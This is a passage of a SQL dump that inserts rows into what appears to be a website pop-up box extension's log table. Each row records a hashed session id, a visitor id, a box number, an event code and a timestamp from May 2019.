(91902, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:22:48'),
(91903, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:22:52'),
(91904, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:23:14'),
(91905, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:23:14'),
(91906, '7b750e037263c68a70aa39d8c8906ce9', '6dde4a5bc1e9c276', 0, 2, 1, '2019-05-05 19:23:22'),
(91907, '08a99439487560a9c77387454372c744', '12fc4b801e5257e8', 0, 2, 1, '2019-05-05 19:23:31'),
(91908, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:23:44'),
(91909, 'ec2f9769c655eb288a8e6dfab1044c15', '43306683943ebaa8', 0, 2, 1, '2019-05-05 19:23:46'),
(91910, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:24:00'),
(91911, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:24:08'),
(91912, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:24:10'),
(91913, 'ec2f9769c655eb288a8e6dfab1044c15', '43306683943ebaa8', 0, 2, 1, '2019-05-05 19:24:20'),
(91914, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:24:26'),
(91915, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:24:37'),
(91916, '7b750e037263c68a70aa39d8c8906ce9', '6dde4a5bc1e9c276', 0, 2, 1, '2019-05-05 19:24:39'),
(91917, '03bd4845ef67779e6a3eace09e464574', '8b3fce727c98d529', 0, 2, 1, '2019-05-05 19:24:45'),
(91918, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:24:47'),
(91919, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:24:51'),
(91920, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:24:57'),
(91921, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:25:04'),
(91922, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:25:08'),
(91923, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:25:17'),
(91924, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:25:20'),
(91925, '0a3b221c7d5a1258cf417e8bdbfba1e3', '515726ffb2d64367', 0, 2, 1, '2019-05-05 19:25:21'),
(91926, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:25:26'),
(91927, '03bd4845ef67779e6a3eace09e464574', '8b3fce727c98d529', 0, 2, 1, '2019-05-05 19:25:47'),
(91928, 'bc6998f489f447439705335d8a2fabe2', '332723ec6654d9f5', 0, 2, 1, '2019-05-05 19:25:51'),
(91929, '7b750e037263c68a70aa39d8c8906ce9', '6dde4a5bc1e9c276', 0, 2, 1, '2019-05-05 19:25:59'),
(91930, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-05 19:26:19'),
(91931, 'ec2f9769c655eb288a8e6dfab1044c15', '43306683943ebaa8', 0, 2, 1, '2019-05-05 19:29:51'),
(91932, '0a335b678c49766d88dbb4a3e9e298e5', '17ddad5b841bf3ca', 0, 2, 1, '2019-05-05 19:30:02'),
(91933, '08a99439487560a9c77387454372c744', '12fc4b801e5257e8', 0, 2, 1, '2019-05-05 19:30:32'),
(91934, '563ee4b9c8e33edd13d2cefb6a16ac40', '0db57dcaa4b20fd7', 0, 2, 1, '2019-05-05 19:31:42'),
(91935, '08a99439487560a9c77387454372c744', '12fc4b801e5257e8', 0, 2, 1, '2019-05-05 19:31:56'),
(91936, '0a3b221c7d5a1258cf417e8bdbfba1e3', '515726ffb2d64367', 0, 2, 1, '2019-05-05 19:33:38'),
(91937, '0fc19d8c69bc262db48da96bd54f1bbc', '473be26baf89a966', 0, 2, 1, '2019-05-05 19:38:37'),
(91938, '97c6e6bb3ce339ca748a74066cd05d0a', '6a01a7643219afab', 0, 2, 1, '2019-05-05 19:40:10'),
(91939, '7b750e037263c68a70aa39d8c8906ce9', '6dde4a5bc1e9c276', 0, 2, 1, '2019-05-05 19:48:12'),
(91940, '1c883d08a20f64fdfa067253016e8580', '08b50b2c3300858b', 0, 2, 1, '2019-05-05 19:51:21'),
(91941, '08a99439487560a9c77387454372c744', '12fc4b801e5257e8', 0, 2, 1, '2019-05-05 19:54:40'),
(91942, '1c883d08a20f64fdfa067253016e8580', '08b50b2c3300858b', 0, 2, 1, '2019-05-05 19:58:16'),
(91943, '97c6e6bb3ce339ca748a74066cd05d0a', '6a01a7643219afab', 0, 2, 1, '2019-05-05 20:19:44'),
(91944, '70f57367dc4484d25d5117562a9eaa57', '4de49c8d631c6d7e', 0, 2, 1, '2019-05-05 20:42:28'),
(91945, '626c553690c2bbcdabf71450ab500681', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-05 20:46:43'),
(91946, 'e977f6083798fbe63e42f91001e32dc0', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-05 20:48:34'),
(91947, '4f235dac7a78a9a78c2260d4eb5eb068', '2fc2a7530ff10818', 0, 2, 1, '2019-05-05 21:03:00'),
(91948, '4f235dac7a78a9a78c2260d4eb5eb068', '2fc2a7530ff10818', 0, 2, 1, '2019-05-05 21:03:16'),
(91949, 'd6224d39e558bb138c284b8e23cfa41a', '8605fcfecc3564f4', 0, 2, 1, '2019-05-05 21:09:34'),
(91950, 'd6224d39e558bb138c284b8e23cfa41a', '8605fcfecc3564f4', 0, 2, 1, '2019-05-05 21:11:10'),
(91951, '8267c32ca4891f154106ea2cb772a69e', 'c12a5d4dd105ae3f', 0, 2, 1, '2019-05-05 21:29:51'),
(91952, 'e977f6083798fbe63e42f91001e32dc0', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-05 21:30:12'),
(91953, 'e977f6083798fbe63e42f91001e32dc0', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-05 21:30:18'),
(91954, 'e977f6083798fbe63e42f91001e32dc0', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-05 21:30:56'),
(91955, 'e977f6083798fbe63e42f91001e32dc0', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-05 21:31:54'),
(91956, 'abaf6a86a297646fefc2ebcac68a6a64', '7d1084109e8d8c2f', 0, 2, 1, '2019-05-05 21:48:37'),
(91957, '1dd9ca10b3f79db2cb6751f21fb1838a', '9848d75575d95b20', 0, 2, 1, '2019-05-05 22:03:34'),
(91958, '92e47f878b281ea432ae52719b8c9b86', '152368483234a613', 0, 2, 1, '2019-05-05 22:39:07'),
(91959, '92e47f878b281ea432ae52719b8c9b86', '152368483234a613', 0, 2, 1, '2019-05-05 22:39:26'),
(91960, 'dc7be1f063848494ea445dc0cf19d0e9', '0b83b588375e9508', 0, 2, 1, '2019-05-05 22:40:36'),
(91961, 'da89f2349913ba6e20893314047a2fd4', 'e3163f1046dc4449', 0, 2, 1, '2019-05-05 23:07:12'),
(91962, '4092fb8858c20108be6f30d8f10363f9', '494698611efddd5a', 0, 2, 1, '2019-05-05 23:08:22'),
(91963, '4092fb8858c20108be6f30d8f10363f9', '494698611efddd5a', 0, 2, 1, '2019-05-05 23:08:28'),
(91964, '4092fb8858c20108be6f30d8f10363f9', '494698611efddd5a', 0, 2, 1, '2019-05-05 23:08:52'),
(91965, '806e500f1b67550ff1b5c5812e013cd0', '6cdcc9abab847bc6', 0, 2, 1, '2019-05-05 23:13:08'),
(91966, '806e500f1b67550ff1b5c5812e013cd0', '6cdcc9abab847bc6', 0, 2, 1, '2019-05-05 23:13:20'),
(91967, 'a104f81b197704a1405c1b7f1915eb9f', '0ae86027da3e13e7', 0, 2, 1, '2019-05-05 23:57:54'),
(91968, 'a104f81b197704a1405c1b7f1915eb9f', '0ae86027da3e13e7', 0, 2, 1, '2019-05-05 23:58:36'),
(91969, 'a104f81b197704a1405c1b7f1915eb9f', '0ae86027da3e13e7', 0, 2, 1, '2019-05-05 23:59:21'),
(91970, '2ef296ffc7c0d198bb3a9689ca55face', '0b1466b4de9b8a16', 0, 2, 1, '2019-05-06 00:09:43'),
(91971, 'e5a300edb9949772fe3a4a785d86eaeb', '3affdb6d237dd814', 0, 2, 1, '2019-05-06 00:28:10'),
(91972, 'f4bff8636a4d0806a999314b09c538d4', '3affdb6d237dd814', 0, 2, 1, '2019-05-06 00:31:51'),
(91973, 'f4bff8636a4d0806a999314b09c538d4', '3affdb6d237dd814', 0, 2, 1, '2019-05-06 00:32:25'),
(91974, '7528b5a63d9b3b42e078766b63340b6b', 'cb994c04314ef021', 0, 2, 1, '2019-05-06 01:05:28'),
(91975, '7528b5a63d9b3b42e078766b63340b6b', 'cb994c04314ef021', 0, 2, 1, '2019-05-06 01:07:37'),
(91976, '848336779d70d124964edf7e09634643', '6acd603860f9a799', 0, 2, 1, '2019-05-06 01:14:14'),
(91977, '848336779d70d124964edf7e09634643', '6acd603860f9a799', 0, 2, 1, '2019-05-06 01:17:11'),
(91978, 'd92bf2596f0142839fbef3da24e0eefc', '331c50760ff4b345', 0, 2, 1, '2019-05-06 01:35:12'),
(91979, 'd92bf2596f0142839fbef3da24e0eefc', '331c50760ff4b345', 0, 2, 1, '2019-05-06 01:35:49'),
(91980, 'd92bf2596f0142839fbef3da24e0eefc', '331c50760ff4b345', 0, 2, 1, '2019-05-06 01:36:57'),
(91981, 'd92bf2596f0142839fbef3da24e0eefc', '331c50760ff4b345', 0, 2, 1, '2019-05-06 01:37:12'),
(91982, 'd92bf2596f0142839fbef3da24e0eefc', '331c50760ff4b345', 0, 2, 1, '2019-05-06 01:37:13'),
(91983, '2d441de3b64a970a5c6b37ad84ca8f13', 'c82195f7827b9487', 0, 2, 1, '2019-05-06 01:53:44'),
(91984, 'a9f5c45d6d09141d125aedab34b98cda', '1d5126c0be496a04', 0, 2, 1, '2019-05-06 02:07:37'),
(91985, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 02:08:40'),
(91986, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 02:08:50'),
(91987, 'd9e46c05f893a9a77de087e549d838d8', '37a0b1974496d320', 0, 2, 1, '2019-05-06 02:12:59'),
(91988, '5a10c191aadd022a6efd6f389f424120', '1f1853d5477441ce', 0, 2, 1, '2019-05-06 02:18:44'),
(91989, 'a9f5c45d6d09141d125aedab34b98cda', '1d5126c0be496a04', 0, 2, 1, '2019-05-06 03:03:13'),
(91990, 'a9f5c45d6d09141d125aedab34b98cda', '1d5126c0be496a04', 0, 2, 1, '2019-05-06 03:03:51'),
(91991, 'a9f5c45d6d09141d125aedab34b98cda', '1d5126c0be496a04', 0, 2, 1, '2019-05-06 03:04:00'),
(91992, 'a9f5c45d6d09141d125aedab34b98cda', '1d5126c0be496a04', 0, 2, 1, '2019-05-06 03:04:06'),
(91993, '37d5d937a2875178b570abe9628a9d36', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-06 03:42:11'),
(91994, '37d5d937a2875178b570abe9628a9d36', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-06 03:43:17'),
(91995, '37d5d937a2875178b570abe9628a9d36', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-06 03:44:41'),
(91996, '37d5d937a2875178b570abe9628a9d36', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-06 03:45:42'),
(91997, '37d5d937a2875178b570abe9628a9d36', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-06 03:46:54'),
(91998, '37d5d937a2875178b570abe9628a9d36', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-06 03:47:04'),
(91999, 'e2f714959e83a288bdb3b7de63962b8c', '798b19a52dc93d69', 0, 2, 1, '2019-05-06 03:52:56'),
(92000, 'e2f714959e83a288bdb3b7de63962b8c', '798b19a52dc93d69', 0, 2, 1, '2019-05-06 03:58:47'),
(92001, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:13:07'),
(92002, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:13:16'),
(92003, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:13:42'),
(92004, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:13:51'),
(92005, 'a20184667bfe02b3656919034a66966e', 'a26b0aaa0303a148', 0, 2, 1, '2019-05-06 04:27:33'),
(92006, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:27:37'),
(92007, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:36:11'),
(92008, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:36:20'),
(92009, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:41:07'),
(92010, 'c23881929dc540c269e02b61d76bc3ac', '7cfdbe5ad8ba3ee7', 0, 2, 1, '2019-05-06 04:41:18'),
(92011, '4981516dd8360d85b057acb223de2644', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-06 04:47:11'),
(92012, '4981516dd8360d85b057acb223de2644', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-06 04:47:42'),
(92013, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-06 04:48:22'),
(92014, '51e5e5ec404d13f850cb97bb88184f73', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-06 04:49:12'),
(92015, 'e9c1920174a98adf56c105734089b748', 'c4c9002176fd8f74', 0, 2, 1, '2019-05-06 04:49:18'),
(92016, '76dd451b013d3aaa20838ee74631245a', 'da5317c19f72b339', 0, 2, 1, '2019-05-06 04:49:40'),
(92017, '51e5e5ec404d13f850cb97bb88184f73', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-06 04:49:41'),
(92018, '7e2e8544af3b49b05a316d8248c18bfd', '7501b42c35accff7', 0, 2, 1, '2019-05-06 04:51:43'),
(92019, '51e5e5ec404d13f850cb97bb88184f73', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-06 04:52:20'),
(92020, '0a06ff922e82193184b1da1843b62363', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-06 04:52:33'),
(92021, '0a06ff922e82193184b1da1843b62363', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-06 04:52:59'),
(92022, '327efdd33be01b203d62603e5c423f23', 'cb9fbcda504bf89a', 0, 2, 1, '2019-05-06 04:53:00'),
(92023, 'fc82f0fb9be00df950ec2ea08dd702fe', '19e548dd12d40585', 0, 2, 1, '2019-05-06 04:56:04'),
(92024, '25400b0e61b935fc5934264f08fe727e', '19faaf83593624a8', 0, 2, 1, '2019-05-06 04:56:29'),
(92025, 'd00ff1ef33508a67054b716ee2810f89', '332723ec6654d9f5', 0, 2, 1, '2019-05-06 04:56:36'),
(92026, 'fc82f0fb9be00df950ec2ea08dd702fe', '19e548dd12d40585', 0, 2, 1, '2019-05-06 04:57:00'),
(92027, 'd00ff1ef33508a67054b716ee2810f89', '332723ec6654d9f5', 0, 2, 1, '2019-05-06 04:57:11'),
(92028, '4981516dd8360d85b057acb223de2644', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-06 04:57:14'),
(92029, 'd00ff1ef33508a67054b716ee2810f89', '332723ec6654d9f5', 0, 2, 1, '2019-05-06 04:57:24'),
(92030, '626c553690c2bbcdabf71450ab500681', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-06 04:57:36'),
(92031, '2e898450d935bb6b6025764fa4414544', 'da8ceca89cfcb758', 0, 2, 1, '2019-05-06 04:57:58'),
(92032, 'bfeecee5046c8bba7cc5c69644d1f6b7', 'bdf4d5bd790a1039', 0, 2, 1, '2019-05-06 04:58:22'),
(92033, '4981516dd8360d85b057acb223de2644', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-06 04:58:43'),
(92034, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-06 04:59:18'),
(92035, '5b73cb5078cd0d99faaadf09fc8c1b09', '7a636002c64226bf', 0, 2, 1, '2019-05-06 04:59:19'),
(92036, '9f46a7f92e484068614f192f42a862bc', '638f6b1ac3b915c3', 0, 2, 1, '2019-05-06 04:59:44'),
(92037, 'afd87689391168152a6f126074c20e5c', '5b256f4a57545070', 0, 2, 1, '2019-05-06 04:59:58'),
(92038, '51e5e5ec404d13f850cb97bb88184f73', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-06 05:00:05'),
(92039, '4981516dd8360d85b057acb223de2644', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-06 05:00:23'),
(92040, '5b73cb5078cd0d99faaadf09fc8c1b09', '7a636002c64226bf', 0, 2, 1, '2019-05-06 05:00:31'),
(92041, '5aec67482d8e24143b1d7e1fb68060fb', '687e4a9b666ab8bc', 0, 2, 1, '2019-05-06 05:00:37'),
(92042, '0a06ff922e82193184b1da1843b62363', 'b4ecb18ba7992a18', 0, 2, 1, '2019-05-06 05:00:45'),
(92043, '51e5e5ec404d13f850cb97bb88184f73', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-06 05:00:54'),
(92044, '26ace4b154499aebf13b4aaa51ab93f0', '849ccf3da4b6790f', 0, 2, 1, '2019-05-06 05:00:57'),
(92045, '51e5e5ec404d13f850cb97bb88184f73', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-06 05:01:06'),
(92046, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-06 05:01:08'),
(92047, 'c8da3cd7d444c87c3eb6f716deacdce4', '83c0683b7d9c2d45', 0, 2, 1, '2019-05-06 05:01:15'),
(92048, '7e2e8544af3b49b05a316d8248c18bfd', '7501b42c35accff7', 0, 2, 1, '2019-05-06 05:01:24'),
(92049, 'b3dbc9156d67dc14ede5c5143dc859fc', 'c965ee39bfe4df73', 0, 2, 1, '2019-05-06 05:01:43'),
(92050, '4981516dd8360d85b057acb223de2644', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-06 05:01:49'),
(92051, 'b3abfd713a6b9221cd14bd91f847c7e5', 'b368901d212a2a6b', 0, 2, 1, '2019-05-06 05:02:05'),
(92052, 'ec8cccabff0360ba24400b235ef83092', 'edfe950d47379572', 0, 2, 1, '2019-05-06 05:02:10'),
(92053, 'b3dbc9156d67dc14ede5c5143dc859fc', 'c965ee39bfe4df73', 0, 2, 1, '2019-05-06 05:02:10'),
(92054, 'b3dbc9156d67dc14ede5c5143dc859fc', 'c965ee39bfe4df73', 0, 2, 1, '2019-05-06 05:02:18'),
(92055, 'ec8cccabff0360ba24400b235ef83092', 'edfe950d47379572', 0, 2, 1, '2019-05-06 05:02:18'),
(92056, 'b3abfd713a6b9221cd14bd91f847c7e5', 'b368901d212a2a6b', 0, 2, 1, '2019-05-06 05:02:20'),
(92057, 'c04794ee0b3c3a22c88abf1d2ab328eb', '22905843105c275f', 0, 2, 1, '2019-05-06 05:02:29'),
(92058, '4981516dd8360d85b057acb223de2644', '65fb1a08fe2b5aab', 0, 2, 1, '2019-05-06 05:02:41'),
(92059, '5e77db138d59ec4c4852ae2a8c90145a', 'cc4c76a65329df3e', 0, 2, 1, '2019-05-06 05:02:44'),
(92060, 'd00ff1ef33508a67054b716ee2810f89', '332723ec6654d9f5', 0, 2, 1, '2019-05-06 05:02:45'),
(92061, '5bf55a79276bc03aea05eaca514365bd', '7340106347808725', 0, 2, 1, '2019-05-06 05:02:47'),
(92062, '26ace4b154499aebf13b4aaa51ab93f0', '849ccf3da4b6790f', 0, 2, 1, '2019-05-06 05:02:47'),
(92063, '5bf55a79276bc03aea05eaca514365bd', '7340106347808725', 0, 2, 1, '2019-05-06 05:02:56'),
(92064, 'a824b5a06f2244d3aa641bb080337502', '503a514a8daa32a7', 0, 2, 1, '2019-05-06 05:02:59'),
(92065, '513035fbd14faf75a1ed55ac5603a911', 'e793b6887430710e', 0, 2, 1, '2019-05-06 05:03:00'),
(92066, '58e3b491d2ff3eb1416179830afedb0c', '324d0c5c1f480926', 0, 2, 1, '2019-05-06 05:03:00'),
(92067, '26ace4b154499aebf13b4aaa51ab93f0', '849ccf3da4b6790f', 0, 2, 1, '2019-05-06 05:03:08'),
(92068, '3e309ccb5bd23d8a4fbba589c41db5bf', 'c28a9f6afad7259d', 0, 2, 1, '2019-05-06 05:03:14'),
(92069, 'b25bf26f61fd85fffd5187a5b3dafbce', '3de88ff4581dab27', 0, 2, 1, '2019-05-06 05:03:15'),
(92070, 'b25bf26f61fd85fffd5187a5b3dafbce', '3de88ff4581dab27', 0, 2, 1, '2019-05-06 05:03:22'),
(92071, '6408b22fc8f3b1ca1f2f7a4a32eba089', '50d02461c9e1908b', 0, 2, 1, '2019-05-06 05:03:30'),
(92072, '2e898450d935bb6b6025764fa4414544', 'da8ceca89cfcb758', 0, 2, 1, '2019-05-06 05:03:43'),
(92073, '6408b22fc8f3b1ca1f2f7a4a32eba089', '50d02461c9e1908b', 0, 2, 1, '2019-05-06 05:03:50'),
(92074, 'e2b20d517264dc3ef5d7e80115482f42', '4c8bdf44c6414969', 0, 2, 1, '2019-05-06 05:04:00'),
(92075, '2e898450d935bb6b6025764fa4414544', 'da8ceca89cfcb758', 0, 2, 1, '2019-05-06 05:04:05'),
(92076, 'e9c1920174a98adf56c105734089b748', 'c4c9002176fd8f74', 0, 2, 1, '2019-05-06 05:04:14'),
(92077, '368b49f9214dc6ed5dde9ba228dcbea1', '87e2978d1d3d1a07', 0, 2, 1, '2019-05-06 05:04:31'),
(92078, '1cbe027467a3e5c49e7781cb5bd0c451', 'a639f655bef0fc87', 0, 2, 1, '2019-05-06 05:04:34'),
(92079, 'b96ce2b696f4f646485bb77ccf9583bd', '687058b58830fd3e', 0, 2, 1, '2019-05-06 05:04:42'),
(92080, 'e2b20d517264dc3ef5d7e80115482f42', '4c8bdf44c6414969', 0, 2, 1, '2019-05-06 05:04:43'),
(92081, 'c04794ee0b3c3a22c88abf1d2ab328eb', '22905843105c275f', 0, 2, 1, '2019-05-06 05:04:49'),
(92082, 'b7ae1ecac3f7a8fa9386a98f19bd9117', 'b32d89f327a39738', 0, 2, 1, '2019-05-06 05:05:08'),
(92083, 'cbc973973fc00ee0052065f62a2a2bca', '721a08095e6444d9', 0, 2, 1, '2019-05-06 05:05:10'),
(92084, 'fc82f0fb9be00df950ec2ea08dd702fe', '19e548dd12d40585', 0, 2, 1, '2019-05-06 05:05:20'),
(92085, '2e898450d935bb6b6025764fa4414544', 'da8ceca89cfcb758', 0, 2, 1, '2019-05-06 05:05:30'),
(92086, 'c7ff19cdf41e21a6eea80c40aba7c684', 'd8923e60c6dca0dc', 0, 2, 1, '2019-05-06 05:05:57'),
(92087, 'b458c12b63c03a309aae6f93beb65efe', '84c73015e9e28e8a', 0, 2, 1, '2019-05-06 05:05:58'),
(92088, 'c8da3cd7d444c87c3eb6f716deacdce4', '83c0683b7d9c2d45', 0, 2, 1, '2019-05-06 05:06:09'),
(92089, 'c8da3cd7d444c87c3eb6f716deacdce4', '83c0683b7d9c2d45', 0, 2, 1, '2019-05-06 05:06:18'),
(92090, 'b458c12b63c03a309aae6f93beb65efe', '84c73015e9e28e8a', 0, 2, 1, '2019-05-06 05:06:27'),
(92091, '25400b0e61b935fc5934264f08fe727e', '19faaf83593624a8', 0, 2, 1, '2019-05-06 05:06:35'),
(92092, 'dd70df1ecb60ac537670c08cf9cb20d9', 'beb388d096cf5162', 0, 2, 1, '2019-05-06 05:06:41'),
(92093, '05c0a0c23ec109216929529b1286a44a', '2d51200ba62a105e', 0, 2, 1, '2019-05-06 05:06:55'),
(92094, '5b73cb5078cd0d99faaadf09fc8c1b09', '7a636002c64226bf', 0, 2, 1, '2019-05-06 05:07:16'),
(92095, '2d441de3b64a970a5c6b37ad84ca8f13', 'c82195f7827b9487', 0, 2, 1, '2019-05-06 05:07:39'),
(92096, 'df72e129743aa407ed897185e835f869', '43306683943ebaa8', 0, 2, 1, '2019-05-06 05:07:52'),
(92097, '2d441de3b64a970a5c6b37ad84ca8f13', 'c82195f7827b9487', 0, 2, 1, '2019-05-06 05:07:56'),
(92098, 'b3abfd713a6b9221cd14bd91f847c7e5', 'b368901d212a2a6b', 0, 2, 1, '2019-05-06 05:08:09'),
(92099, 'd8527204c21eada4b931d10230b764f4', 'd6f95ce097dcbec4', 0, 2, 1, '2019-05-06 05:08:15'),
(92100, '26ace4b154499aebf13b4aaa51ab93f0', '849ccf3da4b6790f', 0, 2, 1, '2019-05-06 05:08:22'),
(92101, '4db5f9403c27f2141c64af0673bcd186', '49bb4afdabd2eaf2', 0, 2, 1, '2019-05-06 05:08:23'),
(92102, '4aecb225b798804b9d443bc26e0759df', '61f99f7954cfc6e5', 0, 2, 1, '2019-05-06 05:08:35');
INSERT INTO `y57u5_rstbox_logs` (`id`, `sessionid`, `visitorid`, `user`, `box`, `event`, `date`) VALUES
(92103, '86535c5df7462bd197d7f752c8138828', '0830474f68858ae3', 0, 2, 1, '2019-05-06 05:08:42'),
(92104, '26ace4b154499aebf13b4aaa51ab93f0', '849ccf3da4b6790f', 0, 2, 1, '2019-05-06 05:08:44'),
(92105, 'dd1265389281fd6d16ef9c2a34cb4ac4', 'e13c478b4e027ae7', 0, 2, 1, '2019-05-06 05:09:02'),
(92106, 'df72e129743aa407ed897185e835f869', '43306683943ebaa8', 0, 2, 1, '2019-05-06 05:09:06'),
(92107, '51e5e5ec404d13f850cb97bb88184f73', 'cfbe639136cf20bf', 0, 2, 1, '2019-05-06 05:09:21'),
(92108, '536718ddea762c0130a6dbd14fb87d5e', '357f95c7125e091a', 0, 2, 1, '2019-05-06 05:09:29'),
(92109, '68d0fb651140c5ad9bf7f4787a847f77', '3bece7bd84369fae', 0, 2, 1, '2019-05-06 05:09:42'),
(92110, '626c553690c2bbcdabf71450ab500681', 'a2b92167f54c9dc2', 0, 2, 1, '2019-05-06 05:09:53'),
(92111, 'ca3560d380abc3d8d627e5e393517614', '77e3b3bc6fe4e58b', 0, 2, 1, '2019-05-06 05:09:56'),
(92112, 'd1ec6c22d96d1e0f1fa98667f945b85e', 'f19010d8a5f137d0', 0, 2, 1, '2019-05-06 05:09:56'),
(92113, 'fc4feab37d1799190062f0cd7a7e4593', '7da8d3b2dc584347', 0, 2, 1, '2019-05-06 05:10:07'),
(92114, '8d79dfae5ffa78b958583eb82a1df5ad', '04c6ab8f531b6329', 0, 2, 1, '2019-05-06 05:10:19'),
(92115, 'fee18a029904ceb11a672ad11f853b4f', 'a3b7aeba0710bcf4', 0, 2, 1, '2019-05-06 05:10:23'),
(92116, '8d79dfae5ffa78b958583eb82a1df5ad', '04c6ab8f531b6329', 0, 2, 1, '2019-05-06 05:10:30'),
(92117, '25400b0e61b935fc5934264f08fe727e', '19faaf83593624a8', 0, 2, 1, '2019-05-06 05:10:41'),
(92118, '37d5d937a2875178b570abe9628a9d36', 'a99c82dd76d590ee', 0, 2, 1, '2019-05-06 05:10:49'),
(92119, 'df71933ca548a98260994a0eb12646b6', 'f08feb3c643cd6a2', 0, 2, 1, '2019-05-06 05:10:52'),
(92120, '3570d21f8e102fb92b9733708c8a8ec3', 'dd85277cbb7da2c1', 0, 2, 1, '2019-05-06 05:10:54'),
(92121, 'bb8b05ab2e08120b96bcb711b295ce91', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-06 05:10:58'),
(92122, 'b3abfd713a6b9221cd14bd91f847c7e5', 'b368901d212a2a6b', 0, 2, 1, '2019-05-06 05:11:09'),
(92123, 'ca3560d380abc3d8d627e5e393517614', '77e3b3bc6fe4e58b', 0, 2, 1, '2019-05-06 05:11:31'),
(92124, '58e3b491d2ff3eb1416179830afedb0c', '324d0c5c1f480926', 0, 2, 1, '2019-05-06 05:11:31'),
(92125, 'dd70df1ecb60ac537670c08cf9cb20d9', 'beb388d096cf5162', 0, 2, 1, '2019-05-06 05:11:34'),
(92126, 'bb8b05ab2e08120b96bcb711b295ce91', '93e0ffe7e12ab9ba', 0, 2, 1, '2019-05-06 05:11:38'),
(92127, '2e898450d935bb6b6025764fa4414544', 'da8ceca89cfcb758', 0, 2, 1, '2019-05-06 05:11:46'),
(92128, '891d43a4b7bf1fb7a259537d3ce36d48', 'c40cb1cc5eb13bc9', 0, 2, 1, '2019-05-06 05:11:49'),
(92129, '3570d21f8e102fb92b9733708c8a8ec3', 'dd85277cbb7da2c1', 0, 2, 1, '2019-05-06 05:11:50'),
(92130, '5bf55a79276bc03aea05eaca514365bd', '7340106347808725', 0, 2, 1, '2019-05-06 05:11:53'),
